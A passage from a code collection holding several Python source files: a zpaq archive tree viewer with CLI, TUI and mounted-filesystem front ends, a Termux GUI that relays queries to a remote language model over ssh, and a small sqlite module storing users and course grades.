for tl_child_node in tl_tree.children(tl_node.tag): # children_sorted:
new_path = tl_child_node.data.fullPath.replace(tl_tree.root, "")
if (tl_child_node.data.is_directory()): # is directory
tl_node_stack.append(tl_child_node)
fs.operations._create_directory(new_path, tl_child_node.data)
else: # is file
fileobj = fs.operations.create(new_path, CREATE_FILE_CREATE_OPTIONS.FILE_NON_DIRECTORY_FILE, None,
FILE_ATTRIBUTE.FILE_ATTRIBUTE_NORMAL, fs.operations._root_obj.security_descriptor, 0, tl_child_node.data)
fileobj.file_obj.file_size = tl_child_node.data.size
bar.update()
bar.close()
def create_filesystem(mountpoint, label, prefix, verbose, debug, input_file, cache_location, max_cache_size):
config = ztv.load_create_config()
print(f"Input file: {input_file}")
fs = create_memory_file_system(mountpoint, label, prefix, verbose, debug, True,
input_file, cache_location, max_cache_size, config,)
try:
print("Starting FS")
fs.start()
print("FS started, keep it running forever")
# while True:
# result = input("Set read-only flag (y/n/q)? ").lower()
# if result == "y":
# fs.operations.read_only = True
# fs.restart(read_only_volume=True)
# elif result == "n":
# fs.operations.read_only = False
# fs.restart(read_only_volume=False)
# elif result == "q":
# break
print(f"Input file: {fs.operations.input_file}")
convert_filetree(config, fs.operations.input_file, fs)
        fs.operations.read_only = True  # flip the operations flag, as in the commented block above; setting it on fs itself has no effect
fs.restart(read_only_volume=True)
input("press enter to exit")
finally:
print("Stopping FS")
fs.stop()
print("FS stopped")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("mountpoint")
parser.add_argument("-z", "--zpaq", type=str, default=None)
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-l", "--label", type=str, default="memfs")
parser.add_argument("-p", "--prefix", type=str, default="")
parser.add_argument("-c", "--cache-location", type=str, default=(os.environ["USERPROFILE"] + "/AppData/local/temp"))
parser.add_argument("-s", "--cache-size-limit", type=int, default=30 * 10**6) # 30 MB
args = parser.parse_args()
if args.zpaq is None:
input_file = None
while input_file is None:
input_file = filedialog.askopenfilename(initialdir=getcwd(), title="Select a zpaq file")
args.zpaq = input_file
create_filesystem(args.mountpoint, args.label, args.prefix, args.verbose,
args.debug, args.zpaq, args.cache_location, args.cache_size_limit)
if __name__ == "__main__":
main() | 20,848 | Python | .py | 497 | 33.350101 | 129 | 0.617098 | EpicGazel/ZpaqTreeView | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,558 | zpaqtreeview.py | EpicGazel_ZpaqTreeView/zpaqtreeview.py | import configparser
from treelib import Tree
import re
from subprocess import check_output, Popen, PIPE, CalledProcessError
import tqdm
from sys import stderr
from platform import system
import traceback
class File:
def __init__(self, full_path, size, last_modified, attribute):
self.fullPath = full_path.rstrip("/")
self.size = size if type(size) is int else int(size.replace(".", ""))
self.lastModified = last_modified
self.attribute = attribute
if full_path[-1] != "/": # not a folder
self.name = full_path.split("/")[-1]
else:
self.name = full_path.split("/")[-2]
def __str__(self):
return f"{self.lastModified}\t{self.size:>14} {self.attribute:10}\t {self.fullPath}"
def is_directory(self):
return "D" in self.attribute
def build_parent_nodes(tree: Tree, path: str):
parent_path = '/'.join(path.split('/')[0:-1])
# TODO: verify works with non-windows drive root dir/linux directories
if parent_path.find('/') == -1:
if not tree.get_node(parent_path): # parent is root
data = File(parent_path, 0, 0, "D")
tree.create_node(parent_path, parent_path, data=data)
return parent_path
elif not tree.get_node(parent_path):
build_parent_nodes(tree, parent_path)
data = File(parent_path, 0, 0, "D")
tree.create_node(parent_path, parent_path, parent=build_parent_nodes(tree, parent_path), data=data)
return parent_path
def add_node_new(tree: Tree, node: File):
build_parent_nodes(tree, node.fullPath)
if tree.get_node(node.fullPath):
tree.get_node(node.fullPath).data = node
return
parent_path = node.fullPath[0:-(len(node.name) + 1)]
tree.create_node(node.fullPath, node.fullPath, parent=parent_path, data=node)
return
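# Added illustration: for a listing entry "G:/a/b/c.txt", add_node_new() first
# materializes any missing ancestors "G:", "G:/a" and "G:/a/b" as directory
# nodes via build_parent_nodes(), then attaches the file node under "G:/a/b".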
def create_filetree(tree: Tree, contents):
pattern = re.compile(
r"-\s(?P<daytime>[0-9]{4}-[0-9]{2}-[0-9]{2}\s[0-9]{2}:[0-9]{2}:[0-9]{2})\s+"
r"(?P<size>[0-9]+(\.[0-9]+)*)\s+(?P<attribute>[A-Za-z0-9]+)\s+(?P<path>.*)")
num_files_pattern = re.compile(r"([0-9]+(\.[0-9])*)+\sfiles")
# Find number of files for estimate (this appears to be off because of the versions?)
num_files = 1000
# for line in contents:
# num_files -= 1
# match = re.search(num_files_pattern, line)
# if match:
# temp = match.group()
# num_files = int(temp[0:temp.find(" files")].replace(".", ""))
# break
# elif line.find("ERROR_FILE_NOT_FOUND") != -1:
# print("ZPAQ file not found.", file=stderr)
# exit(1)
# elif line.find("Usage") != -1:
# print("ZPAQ path may have been entered improperly.", file=stderr)
# exit(1)
print("Creating file tree...")
bar = tqdm.tqdm(contents, total=num_files, unit="files", colour="green", leave=False)
for line in bar:
try:
if "," in line and "-csv" not in line:
line = line.rstrip()
#date, _, __, attribute, fullpath = re.search(pattern, line).groups()
#size = re.search(pattern, line).group("size")
datetime, attribute, size, ratio, _, fullpath = line.split(",")
date = datetime.split(" ")[0]
date = date.strip("'")
attribute = attribute.strip("'")
size = size.strip("'")
ratio = ratio.strip("'")
fullpath = fullpath.strip("'")
testfile = File(fullpath, size, date, attribute)
add_node_new(tree, testfile)
else:
# num_files -= 1
# bar.total = num_files
# bar.refresh()
pass
except IndexError: # sometimes line[0] is invalid
pass
# Ideally would update bar total here instead of just closing and hiding it with leave=False
bar.close()
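# Added illustration (hypothetical record): with `zpaqfranz l archive.zpaq -csv "','"`
# each data line looks like
#   '2023-01-01 10:00:00','A','1.234','0.50','','G:/a/b/c.txt'
# and the split(",") above unpacks it into datetime, attribute, size, ratio, _,
# fullpath before the surrounding quotes are stripped.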
def extract_file(config, zpaq_file, extract_from_path, extract_to_path, is_directory=False):
if is_directory: #len(tree.children(node)) != 0: # assumes all folders have 0 children
# must include trailing /
if extract_to_path[-1] != "/":
extract_to_path += "/"
if extract_from_path[-1] != "/":
extract_from_path += "/"
if system() == "Windows":
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path, "-longpath",
"-find", extract_from_path]
else:
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path]
else: # is file or empty directory
if system() == "Windows":
if extract_to_path[-1] == "/": # must drop trailing /
extract_to_path = extract_to_path[:-1]
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path, "-longpath",
"-find", '/'.join(extract_from_path.split('/')[:-1]) + "/"]
if extract_to_path[-1] == ":": # when extracting to directory root, -space is required for some reason
command.append("-space")
else:
# must include trailing /
if extract_from_path[-1] == "/":
extract_to_path += extract_from_path.split("/")[-2]
else:
extract_to_path += extract_from_path.split("/")[-1]
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path]
print(f"Command: {command}")
try:
print(check_output(command).decode("utf-8"))
except Exception as e: # CalledProcessError as e:
print(f"Something went wrong with extracting. Error: {traceback.format_exc()}")
return extract_to_path + "/" + extract_from_path.split("/")[-1]
def read_file(config, zpaq_file, extract_from_path):
try:
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-longpath", "-stdout"]
print(f"Command: {command}")
return check_output(command)
except Exception as e: # CalledProcessError as e:
print(f"Something went wrong with extracting. Error: {traceback.format_exc()}")
def explore_tree(tree: Tree, config, zpaq_file: str = None):
user_input = "0"
curr_node = tree.root
while user_input != 'q' and user_input != 'Q':
print(f"Current node: {curr_node}")
if not tree.get_node(curr_node).data.is_directory():
print("Is file.")
print("Enter .. to go back a directory. Enter root to go back to "
"root.\nEnter s to save tree to file.\nEnter x to extract file/directory.\nEnter q to quit")
elif len(tree.children(curr_node)) == 0:
print("Directory empty.")
print("Enter .. to go back a directory. Enter root to go back to "
"root.\nEnter s to save tree to file.\nEnter x to extract file/directory.\nEnter q to quit")
else:
for index, node in enumerate(tree.children(curr_node)):
print(f"{index + 1:>4}: {node.data}")
print("Enter a node number to explore it.\nEnter .. to go back a directory. Enter root to go back to "
"root.\nEnter s to save tree to file.\nEnter x to extract file/directory.\nEnter q to quit")
user_input = input()
if user_input == 'q' or user_input == 'Q':
break
elif user_input == 's':
file_type = input("Enter text or json: ")
path = input("Enter path: ")
try:
if file_type == "text":
tree.save2file(path)
elif file_type == "json":
open(path, 'w').write(tree.to_json())
else:
print("Invalid file type selected.")
except Exception as e: # FileNotFoundError, OSError Invalid argument,
print(f"Something went wrong with the file path. Error: {traceback.format_exc()}", file=stderr)
continue
elif user_input.isnumeric() and 0 < int(user_input) <= len(tree.children(curr_node)):
curr_node = tree.children(curr_node)[int(user_input) - 1].identifier
continue
elif user_input == '..':
if tree.parent(curr_node) is not None:
curr_node = tree.parent(curr_node).identifier
else:
print("Already at root.")
continue
elif user_input == 'root':
curr_node = tree.root
continue
elif user_input == 'x':
if zpaq_file is None:
zpaq_file = input("Please specify path to zpaq file: ")
extract_path = input("Enter extract path (not including file/directory name): ").replace("\\", "/")
node = tree.get_node(curr_node)
extract_file(config, zpaq_file, node.data.fullPath, extract_path, not node.is_leaf())
else:
print("Invalid input. Please try again.")
continue
def load_create_config():
config = configparser.ConfigParser()
config.read('config.ini')
needToWrite = False
if not config.has_section('config'):
config.add_section('config')
needToWrite = True
if not config.has_option('config', 'zpaq_path'):
try:
check_output(["zpaqfranz"])
config.set('config', 'zpaq_path', 'zpaqfranz')
print("zpaqfranz found.")
        except (CalledProcessError, FileNotFoundError):
zpaq_path = input("Enter zpaqfranz path (no quotes): ")
# retry until valid
valid_path = False
while not valid_path:
try:
check_output([zpaq_path])
valid_path = True
                except (CalledProcessError, FileNotFoundError):
zpaq_path = input("Path was invalid, please try again. Enter zpaqfranz path (no quotes): ")
config.set('config', 'zpaq_path', zpaq_path)
needToWrite = True
if config.has_option('config', 'zpaq_path'):
valid_path = False
while not valid_path:
            try:
                check_output([config.get('config', 'zpaq_path')])
                valid_path = True
            except Exception:
                print(f"Something went wrong with zpaqfranz.\nError: {traceback.format_exc()}", file=stderr)
                zpaq_path = input("Path was invalid, please try again. Enter zpaqfranz path (no quotes): ")
                config.set('config', 'zpaq_path', zpaq_path)
                needToWrite = True
if needToWrite:
with open('config.ini', 'w') as configfile:
config.write(configfile)
return config
def linux_tests():
# zpaqfranz x "/mnt/b/g_drive.zpaq" "G:/.minecraft/screenshots/2019-05-09_21.57.51.png" -to "/mnt/b/tempout/2019-05-09_21.57.51.png"
print(check_output(["zpaqfranz", "x", "/mnt/b/g_drive.zpaq", "G:/.minecraft/screenshots/2019-05-09_21.57.51.png", "-to", "/mnt/b/tempout/2019-05-09_21.57.51.png"]).decode("utf-8"))
def main(config=None, file_path=None):
if config is None:
config = load_create_config()
if file_path is None:
file_path = input("Enter file path to load: ")
ext = file_path.split('.')[-1]
zpaqpath = config.get('config', 'zpaq_path')
zpaq_file = None
try:
if ext == 'zpaq':
contents = Popen([zpaqpath, "l", file_path, "-longpath", "-terse", "-csv", "','"], stdout=PIPE, encoding="utf-8",
errors="ignore").stdout
zpaq_file = file_path
elif ext == 'txt':
contents = open(file_path, 'r', encoding="utf-8")
else:
print("Invalid file type.", file=stderr)
exit(1)
except Exception as e:
print(f"Something went wrong getting the file list. Error: {traceback.format_exc()}", file=stderr)
exit(1)
tree = Tree()
try:
create_filetree(tree, contents)
except Exception as e:
print(f"Something went wrong creating the file tree. Error: {traceback.format_exc()}", file=stderr)
if ext == 'txt':
contents.close()
exit(1)
if ext == 'txt':
contents.close()
    # When run as a script, drop into the interactive explorer; when imported (e.g. by the TUI/FS frontends), just return the tree
    if __name__ == "__main__":
try:
explore_tree(tree, config, zpaq_file)
except Exception as e:
print(f"Something went wrong exploring the file tree. Error: {traceback.format_exc()}", file=stderr)
exit(1)
else:
return tree
if __name__ == "__main__":
main()
| 12,704 | Python | .py | 267 | 37.445693 | 184 | 0.571763 | EpicGazel/ZpaqTreeView | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,559 | tree_tui.py | EpicGazel_ZpaqTreeView/tree_tui.py | """
Textual TUI tree view of a zpaqfranz archive.
Run with:
    python tree_tui.py ARCHIVE.zpaq
"""
from sys import argv, stderr
from os import getcwd
from textual.app import App, ComposeResult
from textual.containers import Container
from textual.reactive import var
from textual.widgets import Tree, Footer, Header, Input
from tqdm import tqdm
from tkinter import filedialog
import zpaqtreeview as ztv
def convert_filetree(config=None, file_path=None):
tl_tree = ztv.main(config, file_path)
tx_tree = Tree(label=tl_tree.root, data=tl_tree.get_node(tl_tree.root).data)
tl_node_stack = [tl_tree.get_node(tl_tree.root)]
tx_stack = [tx_tree.root]
print("Converting file tree to textual...")
bar = tqdm(total=tl_tree.size(), unit="nodes", colour="green", leave=False)
while len(tl_node_stack) > 0:
tl_node = tl_node_stack.pop()
tx_node = tx_stack.pop()
children_sorted = tl_tree.children(tl_node.tag)
children_sorted.sort(key=lambda x: (x.is_leaf(), x.data.name.lower()))
for tl_child_node in children_sorted:
if tl_child_node.data.is_directory(): # not tl_child_node.is_leaf(): # If directory, true
tl_node_stack.append(tl_child_node)
tx_stack.append(
tx_node.add(tl_child_node.data.name, data=tl_child_node.data))
else:
tx_node.add_leaf(tl_child_node.data.name, data=tl_child_node.data)
bar.update()
bar.close()
return tx_tree
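# Added note: the (is_leaf, lowercased name) sort key above places directories
# before files at each level, each group alphabetically, so the textual tree
# renders folders first like a conventional file manager.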
class TreeTUI(App):
"""Tree view of zpaqfranz archive."""
CSS_PATH = "tree_tui.tcss"
BINDINGS = [
("f", "toggle_files", "Toggle Files"),
("x", "extract_menu", "Extract"),
("q", "quit", "Quit"),
] # TODO: f = find, x = extract, s = save, q = quit, i = file info, maybe something about file selection?
show_tree = var(True)
show_file_input = var(False)
current_node = var(None)
def watch_show_tree(self, show_tree: bool) -> None:
"""Called when show_tree is modified."""
self.set_class(show_tree, "-show-tree")
if show_tree:
self.query_one(Tree).focus()
def watch_show_file_input(self, show_file_input: bool) -> None:
"""Called when show_file_input is modified."""
if show_file_input:
self.query_one(Input).focus()
def compose(self) -> ComposeResult:
"""Compose our UI."""
yield Header()
yield Input(id="file-input", classes="hidden")
with Container():
yield tree
yield Footer()
def on_mount(self) -> None:
self.query_one(Tree).focus()
def action_extract_menu(self) -> None:
out_directory = filedialog.askdirectory(initialdir=getcwd(), mustexist=True, title="Select output directory")
ztv.extract_file(config, input_file, self.current_node.data.fullPath, out_directory, self.current_node.data.is_directory())
# TODO: Toast notification of extraction result
def action_toggle_files(self) -> None:
"""Called in response to key binding."""
self.show_tree = not self.show_tree
def on_tree_node_highlighted(self, event: Tree.NodeHighlighted) -> None:
self.current_node = event.node
if __name__ == "__main__":
config = ztv.load_create_config()
if len(argv) == 1:
input_file = None
while input_file is None:
input_file = filedialog.askopenfilename(initialdir=getcwd(), title="Select a zpaq file",)
elif len(argv) == 2:
input_file = argv[1]
else:
print("Too many arguments.", file=stderr)
exit(1)
tree = convert_filetree(config, input_file)
TreeTUI().run()
| 3,720 | Python | .py | 88 | 35.113636 | 131 | 0.635457 | EpicGazel/ZpaqTreeView | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,560 | AndroidRemoteGPT.py | compilebunny_androidremoteGPT/AndroidRemoteGPT.py | # AndroidRemoteGPT by Jonathan Germain
# Available at https://github.com/compilebunny/androidremoteGPT
# Licensed under version 3 of the GNU General Public License
import os
import time
import json
import re
from subprocess import Popen, PIPE
import sys
try:
import termuxgui as tg
except ModuleNotFoundError:
sys.exit("termuxgui module not found. Please install the Termux:GUI python bindings as described in the tutorial")
def closeconnection(connex):
connex.close()
def ReadConfigFromDisk(cfname):
configfile = open(os.path.expanduser(cfname), "r")
configinfo = configfile.readlines()
print (f"read {len(configinfo)} lines")
# remove all comments flagged with '#' and all whitespace before '='
for i in range(len(configinfo)):
if ('=' in configinfo[i]): configinfo[i]=re.sub(r' +=', '=', configinfo[i])
if ('#' in configinfo[i]): configinfo[i]=configinfo[i][:configinfo[i].index('#')]
# remove whitespace at beginning and end of line and all config commands fewer than 3 non-whitespace characters long
configinfo=list(map(str.rstrip, configinfo))
configinfo=list(map(str.lstrip, configinfo))
configinfo = [line for line in configinfo if len(line)>3]
# Convert the array into a dict structure; keys are made lowercase automatically
infopackage = {'server':'', 'port': '22', 'user':'', 'password':'', 'sequence':'', 'logfile':'', 'next_cmd_indicator':'⇢'}
for i in range(len(configinfo)):
if ('=' in configinfo[i]): infopackage[str.lower(configinfo[i].split('=')[0])] = configinfo[i].split('=')[1]
return infopackage
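# Added illustration (hypothetical values): a minimal ~/.androidGPT accepted by
# the parser above; text after '#' is stripped, so inline comments are allowed:
#
#   server = gpthost          # hostname or a Host alias from ~/.ssh/config
#   port = 22
#   user = jonathan
#   sequence = cd ~/llama.cpp; ./run_chat.sh
#   logfile = gptlog.txt
#   next_cmd_indicator = ⇢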
def WriteConfigToDisk(cfdata):
with open(os.path.expanduser(configfilename), "w") as f:
for k in cfdata.keys():
f.write("{}={}\n".format(k,cfdata[k]))
def ConfigPageTextObject(activity,layout,text,size):
output = tg.TextView(activity, text, layout)
output.setlinearlayoutparams(0)
output.settextsize(size)
output.setheight(tg.View.WRAP_CONTENT)
return output
def MainPageTextObject(activity,layout,text,size):
output = tg.TextView(activity, text, layout)
output.setlinearlayoutparams(0)
output.settextsize(size)
output.setheight(tg.View.WRAP_CONTENT)
return output
def ConfigPageEditBox(activity,layout,text,size):
output = tg.EditText(activity, text, layout)
output.setlinearlayoutparams(0)
output.setdimensions("wrap_content", size)
output.setheight(tg.View.WRAP_CONTENT)
output.sendtextevent(True)
return output
def MainPageEditBox(activity,layout,text,size):
output = tg.EditText(activity, text, layout)
output.setlinearlayoutparams(0)
output.setdimensions("wrap_content", size)
output.setheight(tg.View.WRAP_CONTENT)
output.sendtextevent(True)
return output
def doConfigPage(connection):
    # create a new Activity for the config screen. By default, a new Task is created under configactivity.t
configactivity = tg.Activity(connection,canceloutside=False)
# Create a layout for the config screen
configlayout = tg.LinearLayout(configactivity)
# create a TextView page title
title = tg.TextView(configactivity, "Configuration",configlayout)
title.setlinearlayoutparams(0)
title.settextsize(20)
title.setmargin(5)
# create entry points for all necessary config data
recommendation_message = ConfigPageTextObject(configactivity, configlayout,"For security, passwords are disallowed. Please set up key-based authentication in ~/.ssh/config.",12)
serverask = ConfigPageTextObject(configactivity, configlayout,"host (server name or as defined in .ssh/config)",12)
getservername = ConfigPageEditBox(configactivity, configlayout, configdata['server'],60)
portask = ConfigPageTextObject(configactivity, configlayout,"port number (default: 22)",12)
# the port number requires special treatment because it should allow numbers only
getportnum = tg.EditText(configactivity, configdata['port'], configlayout, inputtype='number')
getportnum.setlinearlayoutparams(0)
getportnum.setdimensions("wrap_content", 10)
getportnum.setheight(tg.View.WRAP_CONTENT)
getportnum.sendtextevent(True)
userask = ConfigPageTextObject(configactivity, configlayout,"user",12)
getusername = ConfigPageEditBox(configactivity, configlayout, configdata['user'],60)
# passask = ConfigPageTextObject(configactivity, configlayout,"password (leave blank if using an ssh key)",12)
# getpassword = ConfigPageEditBox(configactivity, configlayout, configdata['password'],60)
nextask = ConfigPageTextObject(configactivity, configlayout,"next command indicator - important - tells the interface when the bot response is complete and the system is ready for a new query",12)
getnextcmd = ConfigPageEditBox(configactivity, configlayout, configdata['next_cmd_indicator'],1)
sequenceask = ConfigPageTextObject(configactivity, configlayout,"setup sequence: commands to execute after logging in. Separate multiple unix shell commands with semicolons.",12)
getsequence = ConfigPageEditBox(configactivity, configlayout, configdata['sequence'],60)
logfileask = ConfigPageTextObject(configactivity, configlayout,"logfile name",12)
getlogfile = ConfigPageEditBox(configactivity, configlayout, configdata['logfile'],60)
buttons = tg.LinearLayout(configactivity, configlayout, False)
buttons.setlinearlayoutparams(0)
savebutton = tg.Button(configactivity, "save", buttons)
cancelbutton = tg.Button(configactivity, "cancel", buttons)
for eventmanager in connection.events():
if eventmanager.type == tg.Event.destroy and eventmanager.value["finishing"]:
print (f"exiting config screen: {configdata}")
configactivity.finish()
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == savebutton:
configdata["server"] = getservername.gettext()
configdata["port"] = getportnum.gettext()
configdata["user"] = getusername.gettext()
# configdata["password"] = getpassword.gettext()
configdata["sequence"] = getsequence.gettext()
configdata["logfile"] = getlogfile.gettext()
configdata["next_cmd_indicator"] = getnextcmd.gettext()
WriteConfigToDisk(configdata)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == cancelbutton:
configactivity.finish()
# doMainPage(connection)
print (f"exiting config screen: {configdata}")
return
# Finished with doConfigPage
def doMainPage(connection):
mainscreen = tg.Activity(connection,canceloutside=False)
latestcommand = "blank"
lastresponse = "no response yet"
speakstate=False
logstate=False
# Create a set of layouts
first_layout = tg.LinearLayout(mainscreen)
horizdivide = tg.LinearLayout(mainscreen, first_layout, False)
query_side = tg.LinearLayout(mainscreen, horizdivide)
control_side = tg.LinearLayout(mainscreen, horizdivide)
# control_side.setwidth(80)
# create a TextView page title for the query/response side of the screen
title = tg.TextView(mainscreen, "Query/Response",query_side)
title.setlinearlayoutparams(0)
title.settextsize(20)
title.setmargin(5)
nextcommand = MainPageEditBox(mainscreen,query_side,latestcommand,12)
response = MainPageTextObject(mainscreen,query_side,"no response yet",12)
requestbutton = tg.Button(mainscreen, "request", query_side)
requestbutton.setlinearlayoutparams(0)
requestbutton.setheight(tg.View.WRAP_CONTENT)
# create a TextView page title for the control side of the screen
title = tg.TextView(mainscreen, "Control", control_side)
title.setlinearlayoutparams(0)
title.settextsize(20)
title.setmargin(5)
configbutton = tg.Button(mainscreen, "configuration", control_side)
configbutton.setlinearlayoutparams(0)
configbutton.setheight(tg.View.WRAP_CONTENT)
connectbutton = tg.Button(mainscreen, "connect", control_side)
connectbutton.setlinearlayoutparams(0)
connectbutton.setheight(tg.View.WRAP_CONTENT)
disconnectbutton = tg.Button(mainscreen, "disconnect", control_side)
disconnectbutton.setlinearlayoutparams(0)
disconnectbutton.setheight(tg.View.WRAP_CONTENT)
speak = tg.Checkbox(mainscreen,"speak?",control_side,False)
speak.setlinearlayoutparams(0)
speak.setheight(tg.View.WRAP_CONTENT)
logcheckbox = tg.Checkbox(mainscreen,"log?",control_side,False)
logcheckbox.setlinearlayoutparams(0)
logcheckbox.setheight(tg.View.WRAP_CONTENT)
exitbutton = tg.Button(mainscreen, "exit", control_side)
exitbutton.setlinearlayoutparams(0)
exitbutton.setheight(tg.View.WRAP_CONTENT)
errorstate_text = MainPageTextObject(mainscreen,control_side,"no state",12)
logstate_text = MainPageTextObject(mainscreen,control_side,"not logging",12)
speakstate_text = MainPageTextObject(mainscreen,control_side,"not speaking",12)
for eventmanager in connection.events():
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == speak:
if (speakstate):
speakstate=False
speakstate_text.settext("speech off")
else:
speakstate=True
speakstate_text.settext("speech on")
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == logcheckbox:
if (logstate):
logstate=False
logstate_text.settext("logging off")
else:
logstate=True
logstate_text.settext("logging on")
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == configbutton:
doConfigPage(c)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == connectbutton:
errorstate_text.settext("waiting for connection")
ssh_connection=MakeSSHConnection()
lastresponse=printthrough(ssh_connection,False)
response.settext(lastresponse)
errorstate_text.settext("connected")
# control_side.setwidth(80)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == disconnectbutton:
try:
if ssh_connection.poll() is None: ssh_connection.terminate()
            except NameError: pass  # no connection was ever opened
errorstate_text.settext("disconnected")
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == exitbutton:
mainscreen.finish()
try:
if ssh_connection.poll() is None: ssh_connection.terminate()
            except NameError: pass  # no connection was ever opened
connection.close()
sys.exit(0)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == requestbutton:
try:
if ssh_connection.poll() is None:
ssh_connection.stdin.write(nextcommand.gettext()+"\n")
ssh_connection.stdin.flush() # important
errorstate_text.settext("awaiting response")
lastresponse=printthrough(ssh_connection,False)
response.settext(lastresponse)
errorstate_text.settext("connected")
# Log the result
if (logstate): logresult(nextcommand.gettext(),lastresponse)
if (speakstate): voicespeak(lastresponse)
# control_side.setwidth(80)
except NameError: errorstate_text.settext("disconnected")
def printthrough(handle,debug):
# Read the source until the next command indicator is reached and return the result
response = ""
if (debug==True): print ("debug mode")
while True:
newchar = handle.stdout.read(1)
if (debug==True): print (f":{newchar}:")
response = response + newchar
if configdata["next_cmd_indicator"] in newchar:
break
if (debug==True): print ("printthrough complete")
return response
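# Added note: printthrough() reads stdout one character at a time until the
# configured next_cmd_indicator appears, so the remote setup sequence should
# leave the shell printing that sentinel (for example via PS1='⇢') after each
# reply; otherwise the interface blocks waiting for it.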
def logresult(query,response):
with open(configdata["logfile"],'a') as logf: logf.write("[query] "+query+"\n\n"+"[response] "+response+"\n\n")
def voicespeak(text):
speakhandle= Popen(['espeak','--stdin'],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
speakhandle.communicate(text)
speakhandle.terminate()
def MakeSSHConnection():
if len(configdata["port"])<1: configdata["port"]="22"
# p= Popen([ssh_location,'-p',configdata["port"],configdata["server"]],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
if len(configdata["user"])<1: p= Popen(['ssh','-p',configdata["port"],configdata["server"]],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
if len(configdata["user"])>1:
descrip=configdata["user"]+"@"+configdata["server"]
p= Popen(['ssh','-p',configdata["port"],descrip],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
if len(configdata["sequence"])>1:
p.stdin.write(configdata["sequence"]+"\n")
p.stdin.flush() # important
return(p)
# Start program
print ("AndroidRemoteGPT by Jonathan Germain\nAvailable at https://github.com/compilebunny/androidremoteGPT\nLicensed under version 3 of the GNU General Public License")
# Variable definitions
configfilename = '~/.androidGPT'
python_location="/data/data/com.termux/files/usr/bin/python"
ssh_location="/data/data/com.termux/files/usr/bin/ssh"
print ("starting")
configdata = ReadConfigFromDisk(configfilename)
print (f"{configdata}")
print (f"About to make TermuxGUI connection")
with tg.Connection() as c:
#Load the front page of the app
lastresponse="no response"
doMainPage(c)
| 12,683 | Python | .py | 260 | 45.934615 | 197 | 0.776168 | compilebunny/androidremoteGPT | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,561 | sqlite.py | Xunop_death-knell/sqlite.py | import sqlite3
from course import Course
def create_database():
conn = sqlite3.connect('data.db')
c = conn.cursor()
# 创建 users 表
c.execute('''
CREATE TABLE IF NOT EXISTS users (
user_id TEXT PRIMARY KEY,
username TEXT,
password TEXT
year TEXT,
semester TEXT
)
''')
    # Create the courses table, updated to include user_id
c.execute('''
CREATE TABLE IF NOT EXISTS courses (
year TEXT,
semester TEXT,
course_id TEXT,
name TEXT,
type TEXT,
credit TEXT,
gpa TEXT,
normal_score TEXT,
real_score TEXT,
total_score TEXT,
user_id TEXT,
FOREIGN KEY (user_id) REFERENCES users(user_id),
PRIMARY KEY (course_id, year, semester, user_id)
)
''')
conn.commit()
conn.close()
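# Added note: SQLite only enforces the FOREIGN KEY clause above when each
# connection runs "PRAGMA foreign_keys = ON"; the helpers in this module do
# not, so the users(user_id) reference is informational. A hedged sketch:
#
#   conn = sqlite3.connect('data.db')
#   conn.execute("PRAGMA foreign_keys = ON")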
def insert_user(user_id, username, password, year, semester):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
INSERT INTO users (user_id, username, password, year, semester)
VALUES (?, ?, ?, ?, ?)
''', (user_id, username, password, year, semester))
conn.commit()
conn.close()
def get_user(user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
SELECT * FROM users WHERE user_id = ?
''', (user_id,))
user = c.fetchone()
conn.close()
return user
def insert_course(course: Course, user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
if course.real_score in [None, '', 'NULL']:
course.real_score = 0
if course.normal_score in [None, '', 'NULL']:
course.normal_score = 0
c.execute('''
INSERT INTO courses (year, semester, course_id, name, type, credit, gpa, normal_score, real_score, total_score, user_id)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
''', (course.year, course.semester, course.course_id, course.name, course.type, course.credit, course.gpa, course.normal_score, course.real_score, course.total_score, user_id))
conn.commit()
conn.close()
def get_courses(user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
SELECT * FROM courses WHERE user_id = ?
''', (user_id,))
courses = c.fetchall()
conn.close()
return courses
def get_course(user_id, course_id, year, semester):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
SELECT * FROM courses WHERE user_id = ? AND course_id = ? AND year = ? AND semester = ?
''', (user_id, course_id, year, semester))
course = c.fetchone()
conn.close()
if course is None:
return None
return Course(*course)
# update_course update course
def update_course(course: Course, user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
if course.real_score in [None, '', 'NULL']:
course.real_score = 0
if course.normal_score in [None, '', 'NULL']:
course.normal_score = 0
c.execute('''
UPDATE courses SET real_score = ?, normal_score = ?, total_score = ? WHERE user_id = ? AND course_id = ? AND year = ? AND semester = ?
''', (course.real_score, course.normal_score, course.total_score, user_id, course.course_id, course.year, course.semester))
conn.commit()
conn.close()
